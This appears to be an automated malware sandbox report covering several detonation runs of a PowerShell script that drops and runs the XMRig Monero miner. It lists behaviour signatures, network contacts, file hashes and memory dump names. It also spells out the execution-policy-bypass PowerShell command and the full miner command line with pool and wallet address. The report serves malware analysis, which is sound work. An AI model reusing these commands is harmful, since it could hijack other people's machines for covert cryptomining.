Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

memory/392-0-0x00007FFF77AD3000-0x00007FFF77AD5000-memory.dmp

memory/392-1-0x00000213D49B0000-0x00000213D49D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_idlqqnvd.mec.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/392-11-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

memory/392-12-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

memory/392-14-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

memory/392-15-0x00000213D4A40000-0x00000213D4A52000-memory.dmp

memory/392-16-0x00000213D49A0000-0x00000213D49AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4440-47-0x000001D215140000-0x000001D215160000-memory.dmp

memory/4440-48-0x000001D215180000-0x000001D2151A0000-memory.dmp

memory/4440-49-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/392-50-0x00007FFF77AD3000-0x00007FFF77AD5000-memory.dmp

memory/392-51-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

memory/4440-52-0x000001D2151A0000-0x000001D2151C0000-memory.dmp

memory/4440-53-0x000001D2151C0000-0x000001D2151E0000-memory.dmp

memory/4440-54-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/392-55-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

memory/4440-56-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-58-0x000001D2151A0000-0x000001D2151C0000-memory.dmp

memory/4440-57-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-59-0x000001D2151C0000-0x000001D2151E0000-memory.dmp

memory/4440-60-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-61-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-62-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-63-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-64-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-65-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-66-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-67-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-68-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-69-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-70-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-71-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-72-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-73-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-74-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-75-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-76-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-77-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-78-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-79-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-80-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-81-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-82-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-83-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-84-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-85-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-86-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-87-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-88-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-89-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-90-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-91-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-92-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-93-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-94-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-95-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-96-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-97-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-98-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-99-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-100-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-101-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-102-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-103-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-104-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-105-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-106-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-107-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-108-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-109-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-110-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-111-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-112-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-113-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-114-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-115-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-116-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-117-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

memory/4440-118-0x00007FF688E20000-0x00007FF689A53000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:45

Platform

win10-20240404-en

Max time kernel

1789s

Max time network

1755s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 f.f.f.f.8.f.2.0.2.c.1.c.3.1.0.9.f.f.f.f.6.9.8.8.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 152.141.79.40.in-addr.arpa udp

Files

memory/3328-3-0x00007FFC73053000-0x00007FFC73054000-memory.dmp

memory/3328-5-0x00000185F5520000-0x00000185F5542000-memory.dmp

memory/3328-6-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

memory/3328-9-0x00000185F56D0000-0x00000185F5746000-memory.dmp

memory/3328-10-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_guee0e30.l0o.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3328-25-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

memory/3328-48-0x00000185F56B0000-0x00000185F56C2000-memory.dmp

memory/3328-61-0x00000185F5670000-0x00000185F567A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/512-90-0x0000020FE4B90000-0x0000020FE4BB0000-memory.dmp

memory/512-91-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/3328-92-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

memory/3328-94-0x00007FFC73053000-0x00007FFC73054000-memory.dmp

memory/512-93-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/3328-95-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

memory/3328-96-0x00007FFC73050000-0x00007FFC73A3C000-memory.dmp

memory/512-97-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-98-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-99-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-100-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-101-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-102-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-103-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-104-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-105-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-106-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-107-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-108-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-109-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-110-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-111-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-112-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-113-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-114-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-115-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-116-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-117-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-118-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-119-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-120-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-121-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-122-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-123-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-124-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-125-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-126-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-127-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-128-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-129-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-130-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-131-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-132-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-133-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-134-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-135-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-136-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-137-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-138-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-139-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-140-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-141-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-142-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-143-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-144-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-145-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-146-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-147-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-148-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-149-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-150-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-151-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-152-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-153-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-154-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-155-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-156-0x00007FF620930000-0x00007FF621563000-memory.dmp

memory/512-157-0x00007FF620930000-0x00007FF621563000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:48

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1766s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3920-0-0x00007FF829673000-0x00007FF829675000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgfjg3fv.zo1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3920-9-0x0000023547990000-0x00000235479B2000-memory.dmp

memory/3920-10-0x00007FF829670000-0x00007FF82A132000-memory.dmp

memory/3920-11-0x00007FF829670000-0x00007FF82A132000-memory.dmp

memory/3920-12-0x00007FF829670000-0x00007FF82A132000-memory.dmp

memory/3920-14-0x0000023547A30000-0x0000023547A42000-memory.dmp

memory/3920-15-0x0000023547A20000-0x0000023547A2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3904-46-0x0000024A453E0000-0x0000024A45400000-memory.dmp

memory/3904-47-0x0000024A45430000-0x0000024A45450000-memory.dmp

memory/3904-48-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3920-49-0x00007FF829670000-0x00007FF82A132000-memory.dmp

memory/3920-50-0x00007FF829673000-0x00007FF829675000-memory.dmp

memory/3904-51-0x0000024A45450000-0x0000024A45470000-memory.dmp

memory/3904-52-0x0000024A45470000-0x0000024A45490000-memory.dmp

memory/3904-53-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-54-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-56-0x0000024A45450000-0x0000024A45470000-memory.dmp

memory/3904-55-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-57-0x0000024A45470000-0x0000024A45490000-memory.dmp

memory/3904-58-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-59-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-60-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-61-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-62-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-63-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-64-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-65-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-66-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-67-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-68-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-69-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-70-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-71-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-72-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-73-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-74-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-75-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-76-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-77-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-78-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-79-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-80-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-81-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-82-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-83-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

